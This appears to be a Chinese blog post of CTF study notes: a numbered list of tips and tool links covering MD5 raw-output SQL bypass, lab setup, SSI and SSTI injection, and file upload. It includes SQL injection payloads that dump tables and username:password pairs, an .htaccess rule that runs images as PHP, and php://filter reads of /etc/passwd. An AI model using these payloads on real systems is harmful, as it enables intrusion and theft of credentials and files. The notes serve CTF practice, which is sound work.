1,MD5语法
MD5为0--9 a--f
标准格式
md5(string,raw)
参数描述string必需。要计算的字符串。raw可选。规定十六进制或二进制输出格式:TRUE-原始 16字符二进制格式 。FALSE-默认 32字符十六进制数。
这里的16位秘文和32位秘文的第8-24位子字符串时一样的,也就是中间的16位。
这里的原始16字符二进制格式一般会有乱码,如果想解决的话
1.对输出的16位字节的二进制转换为十六进制。
2.取32位秘文的中间16位
如果MD5值经过hex后,就构成万能密码进行了sql注入,这个就是这个题的关键
在mysql里面,在用作布尔型判断时,以数字开头的字符串会被当做整型数。
要注意的是这种情况是必须要有单引号括起来的,比如password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1 ,也就相当于password=‘xxx’ or true,所以返回值就是true。
如果只有数字的话就不用单引号
这里有个脚本能够跑出来

2,在小皮中配置dvwa的网站
DVWA靶场环境搭建+Phpstudy配置 - Test挖掘者 - 博客园 (cnblogs.com)
3,在小皮中配置pikachu
在phpstudy中打开环境
在联想浏览器中打开输入pikachu
4,靶机练习
新手必练的15个靶场推荐_在线靶场-CSDN博客
333555
123456
5,upx脱壳工具使用
进入cmd命令

输入upx -d 加文件名
即可脱壳成功
6,VBScript.Encode的解密
形式#@^DAAAAA==6"VGXDI502IxTQQAAA==^#@
工具对加密VBScript代码解密 - VBScript.Encode解密 (kfju.com)
7,ssi注入
补充一下什么是ssi注入,SSI 注入全称Server-Side Includes Injection(服务端包含注入),ssi可以赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,当在网站目录中发现了.stm .shtm .shtml或在界面中发现了

{$what}

Welcome, {{username}}

{%$a%}
就容易产生ssi注入,此处问题的其注入格式为:。 8,Flask 应用程序定义 1./geneSign 路由:当通过 GET 或 POST 方法访问此路径时,会调用 geneSign 函数。这个函数的作用是根据提供的参数 param 和固定的动作 action(在这个例子中是 "scan"),生成一个签名(sign)并返回。这个签名是通过 get_sign 函数生成的,它使用 md5 散列算法。 2./De1ta 路由:当通过 GET 或 POST 方法访问此路径时,会调用 challenge 函数。这个函数首先从请求的 cookies 中获取 action 和 sign,从请求的参数中获取 param,然后创建一个 Task 实例并执行它的 Exec 方法。Task 类的 Exec 方法会根据 action 的值来执行不同的操作,如扫描文件或读取文件内容,并返回执行结果。 3./ 根路由:当访问网站的根路径时,会调用 index 函数。这个函数简单地读取并返回 “code.txt” 文件的内容。 9,sql注入类型1 数字型注入点 类似结构 http://xxx.com/users.php?id=1 基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。这一类的 SQL 语句原型大概为 "select * from 表名 where id=1" 若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破: select * from 表名 where id=1 and 1=1 数字型驻点常见的注入语句(Payload) 查询数据库名和版本 id=-1 union select 1,database(),version() --+ 查询指定数据库中的表名 id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+ 查询指定数据库中指定表名中的列名字段 id=-1 union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+ 查询指定表中的数据 id=-1 union select 1,database(),(select group_concat(username,':',password) from secyrity.users) --+ 1 字符型注入点 类似结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 "select * from 表名 where name='admin'" 值得注意的是这里相比于数字型注入类型的sql语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破: select * from 表名 where name='admin' and 1=1 '' 字符型常见的注入语句(Payload) 后台语句 - SELECT * FROM users WHERE id=('$id') LIMIT 0,1 id=-1') union select 1,database(),version() --+ id=-2") union select 1,2,3--+ 搜索性注入点 这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 keyword=关键字 ,有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%' 若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破: select * from 表名 where 字段 like '%测试%' and '%1%'='%1%' 10,sql注入2 字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 数字型注入 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 判断字符段数量 id=1' order by 3 --+ id=1' order by 4 --+ 查数据库名 id=-1' union select 1,database(),3 --+ 查表名和列名 information_schema.tables和information_schema.columns 获取敏感数据 如果猜测flag可能存储在fl4g表中,可以使用?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+来提取flag值。 11,文件泄露

12,Unicode与ASCII编码互转工具
http://uni2ascii.supfree.net/
13,CTF各种编码
网址CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码 (hiencode.com)
CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码 (hiencode.com)
14,.htaccess文件上传
AddType
application/x‐httpd‐php .jpg
15,二维码的补全工具
https://merricx.github.io/qrazybox/
16,Filter的利用

php://filter 是 PHP 中的一种流过滤器(stream filter)机制,用于对数据流进行过滤和转换。它允许你在读取或写入数据流时应用过滤器,以便在传输数据之前或之后进行一些处理。
使用 php://filter 的基本语法如下:php://filter//resource
其中: 是过滤器的名称,表示你要应用的过滤器类型。
resource 是要过滤的数据流资源。
以下是一些例子:Base64 编码解码:
$data = 'Hello, World!';
$encoded = file_get_contents('php://filter/read=convert.base64-encode/resource=data:text/plain;base64,' . base64_encode($data));
echo $encoded;$decoded = file_get_contents('php://filter/write=convert.base64-decode/resource=data:text/plain;base64,' . base64_encode($data));
echo $decoded;
上述例子中,convert.base64-encode 和 convert.base64-decode 是两个过滤器,分别用于对数据进行 Base64 编码和解码。字符串替换:$data = 'Hello, World!';
$filteredData = file_get_contents('php://filter/read=string.toupper/resource=data:text/plain;base64,' . base64_encode($data));
echo $filteredData;
在这个例子中,string.toupper 过滤器将字符串转换为大写。自定义过滤器:stream_filter_register('custom_filter', 'CustomFilter');class CustomFilter extends php_user_filter {public function filter($in, $out, &$consumed, $closing) {while ($bucket = stream_bucket_make_writeable($in)) {$bucket->data = strtoupper($bucket->data);$consumed += $bucket->datalen;stream_bucket_append($out, $bucket);}return PSFS_PASS_ON;}
}$data = 'Hello, World!';
$filteredData = file_get_contents('php://filter/read=custom_filter/resource=data:text/plain;base64,' . base64_encode($data));
echo $filteredData;
这个例子中,定义了一个自定义的过滤器 CustomFilter,它将输入数据转换为大写。总体来说,php://filter 提供了一种灵活的方式来处理数据流,你可以根据具体需求选择合适的过滤器进行处理。

17,回旋13踢
ROT13 @ http://www.rot13.de/

ROT13解码
例如xw4n73qm23z
18,解压在线工具
在线解压工具 - 蜻蜓在线工具 (33tool.com)
19,破解zip密码在线工具
ZIP 密码在线破解 - 百川在线工具箱 (chaitin.cn)
20,base64的转换图片
Base64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具 (the-x.cn)
21,cyberchef解码
CyberChef在线加密解密-🔰雨苁ℒ🔰 (ddosi.org)
CyberChef
22,音乐
myfreemp3在线音乐官网
23,静态图片分离器
https://tu.sioe.cn/gj/fenjie/
24,音频转换为摩斯密码
https://morsecodemagic.com/zh/摩尔斯电码音频解码器/
摩斯密码音频解码器 – 摩斯密码音频转换成文字 (dimorse.com)
25,多表代换加密
在线的 Playfair Cipher 工具
26,条码扫描运行器
条形码阅读器。免费在线 Web 应用程序 (inliteresearch.com)
27,bp发送post请求
1、GET修改为POST
2、加上:Content-Type: application/x-www-form-urlencoded
3、末尾添加需上传语句:例如:b=2
28,php的文件包含漏洞,可以用到的伪协议如下:
file:// 访问本地文件系统
http:// 访问http(s)网址
ftp:// 访问ftp
php:// 访问各个输入/输出流
zlib:// 压缩流
data:// 数据
rar:// RAR压缩包
ogg:// 音频流
例如 ?filename=php://filter/read=convert.base64/resource=/etc/passwd
29,php支持的字符编码111.txt 可用于爆破
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
ISO-2022-JP
ISO-2022-JP-MS
CP932
CP51932
SJIS-mac
SJIS-Mobile#DOCOMO
SJIS-Mobile#KDDI
SJIS-Mobile#SOFTBANK
UTF-8-Mobile#DOCOMO
UTF-8-Mobile#KDDI-A
UTF-8-Mobile#KDDI-B
UTF-8-Mobile#SOFTBANK
ISO-2022-JP-MOBILE#KDDI
JIS
JIS-ms
CP50220
CP50220raw
CP50221
CP50222
ISO-8859-1*
ISO-8859-2*
ISO-8859-3*
ISO-8859-4*
ISO-8859-5*
ISO-8859-6*
ISO-8859-7*
ISO-8859-8*
ISO-8859-9*
ISO-8859-10*
ISO-8859-13*
ISO-8859-14*
ISO-8859-15*
ISO-8859-16*
byte2be
byte2le
byte4be
byte4le
BASE64
HTML-ENTITIES
7bit
8bit
EUC-CN*
CP936
GB18030
HZ
EUC-TW*
CP950
BIG-5*
EUC-KR*
UHC
ISO-2022-KR
Windows-1251
Windows-1252
CP866
KOI8-R*
KOI8-U*
ArmSCII-8
30,php伪协议的文件读取
其中%3a%2f%2f 解码后就是 😕/ 编码为了在url中安全的传输

  • php://filter:这是 PHP 提供的一个伪协议,其作用是对文件进行过滤操作。借助该协议,能够在读取或写入文件时对数据进行处理,例如编码转换、加密等。
  • read=convert.base64-encode:这属于过滤指令,它规定在读取文件时要把文件内容转换为 Base64 编码。这样一来,文件内容就会以 Base64 编码的形式返回,防止出现二进制数据在传输过程中损坏或者无法正确显示的问题。
  • resource=/var/www/html/flag:此部分指定了要读取的文件路径。这里表明要读取的是服务器上 /var/www/html/flag 这个文件。
    31,文件上传注意
    直接上传图片马,连.png结尾的都上传不了,说明服务器会对图片内容进行检测。
    1.mime检测;
    2.大小写绕过;
    3.等价替换(php5,php3)
    4.也是本题的考点,利用JavaScript执行php代码(正常的php代码会被检测到,所以就考虑用JavaScript来执行)
    JAVAscript的一句话木马

32.模板注入例子
url+{{7+7}}是否输出答案
利用{{config}}查看全局变量
攻防世界-Web_python_template_injection详解_攻防世界web-python-template-jection-CSDN博客

33,ssti注入

34.垃圾邮件解密
spammimic - decoded
35.零宽字符解码
Unicode Steganography with Zero-Width Characters (330k.github.io)
36.扣子AI视频生成工具
扣子空间
37.凹凸网站转换字体
凹凸工坊-手写转换官网_手写模拟生成器_一键生成手写文稿_手写字体在线转换_在线字体制作_手写APP下载_模仿手写软件_AI手写字体生成_手写字体生成器_字体下载 (autohanding.com)
用于转手写
38.pixpin强大截图软件
PixPin - 强大且免费的截图贴图工具
39.py代码反编译
在线反编译pyc网址:https://tool.lu/pyc 得到py文件

40.许多好用工具
在线汉字数笔画工具 - 统计计算 (txttool.com)

41.高清图片大全
pixabay
560万+张令人惊叹的免费图片,可在任何地方使用 - Pixabay
42.特效生成AI
Visual Effects • Higgsfield
43.漏洞文库合集
漏洞文库合集 - 搜索 (bing.com)

【WEB】ssrf gopher协议 | 狼组安全团队公开知识库 (wgpsec.org)

posted on 2025-11-10 12:52  DXUYU  阅读(0)  评论(0)    收藏  举报